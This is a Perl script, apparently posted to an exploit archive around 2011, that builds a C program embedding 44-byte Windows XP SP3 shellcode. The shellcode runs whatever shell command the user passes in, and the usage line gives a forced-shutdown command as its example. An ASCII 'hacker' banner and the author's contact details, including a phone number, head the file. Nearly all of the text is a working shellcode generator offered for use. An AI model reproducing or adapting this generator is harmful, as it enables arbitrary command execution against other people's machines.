#!/usr/bin/perl
system("cls");
sub logo(){
print q'
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
1 ______ 0
0 .-" "-. 1
1 / KedAns-Dz \ =-=-=-=-=-=-=-=-=-=-=-| 0
0 Algerian HaCker | | > Site : 1337day.com | 1
1 --------------- |, .-. .-. ,| > Twitter : @kedans | 0
0 | )(_o/ \o_)( | > ked-h@hotmail.com | 1
1 |/ /\ \| =-=-=-=-=-=-=-=-=-=-=| 0
0 (@_ (_ ^^ _) HaCkerS-StreeT-Team 1
1 _ ) \_______\__|IIIIII|__/_______________________ 0
0 (_)@8@8{}<________|-\IIIIII/-|________________________> 1
1 )_/ \ / 0
0 (@ `--------` © 2011, Inj3ct0r Team 1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
0 Windows/32bit - Command Execution Exploit/ShellCode - 44 Bytes + CMD 1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
';
}
logo();
###
# Title : win32/xp sp3 Command Execution exploit/shellcode - 44 Bytes + CMD
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com * www.09exploit.com
# Twitter page : twitter.com/kedans
# platform : win32
# Impact : Command Execution / Shellcode maker
# Tested on : Windows XP sp3 Fr
###
# (~) Greetings To : Caddy-Dz (+) JaGo-Dz (+) Dr.Ride (+) All My Friends
###
$ARGC=@ARGV;
if ($ARGC!=1) {
print "\n [!] Usage: perl $0 [Command] \n\n";
die " [*] f.ex: perl $0 shutdown -s -t 18 \n";
}
my $CMD = shift;
my $header = q'
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(){
unsigned char shellcode[]=
';
my $sh = q'
"\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x29\x53\xbb\xad\x23\x86\x7c".
"\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff".
"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20'.$CMD.'"';
my $end = q'
printf("Size = %d bytes\n", strlen(shellcode));
((void (*)())shellcode)();
return 0;
}
';
print $header.$sh.$end;
My LogiX is Undeniable.
Command Execution exploit/shellcode
